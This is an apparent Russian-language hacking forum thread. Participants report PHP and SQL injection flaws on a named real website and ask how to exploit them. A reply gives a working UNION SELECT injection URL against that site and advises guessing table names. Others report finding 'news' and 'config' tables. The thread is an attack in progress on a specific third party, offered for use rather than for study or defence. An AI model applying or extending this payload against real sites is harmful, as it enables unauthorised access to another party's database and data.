![]() |
php-inj & sql-inj на generis.ru
На этом сайте найдены
http://www.generis.ru/ потенциальная php-inj http://www.generis.ru/?page=qwe и потенциальная sql-inj http://www.generis.ru/?page=press_wholenews&id=qwe Вот я нашел уязвимости, как ими можно воспользоваться? |
Цитата:
|
SQL-inj красава =))
пхп-инъекции к сожалению там нет... если толкьо локальных html-страничек.. но это ничего не даст.. |
Цитата:
|
Да, там скуль инъекция
http://www.generis.ru/?page=press_wholenews&id=-1+union+select+1,'blablabla',3,4,5,6/* Далее подбирай таблицы |
нашёл таблицу news но толку дамаю мало буит от этой таблицы)))
|
Да, действительно, толку мало...
|
еще таблица config
но столбцы не подобрал |
Цитата:
|
Цитата:
|
| Время: 03:07 |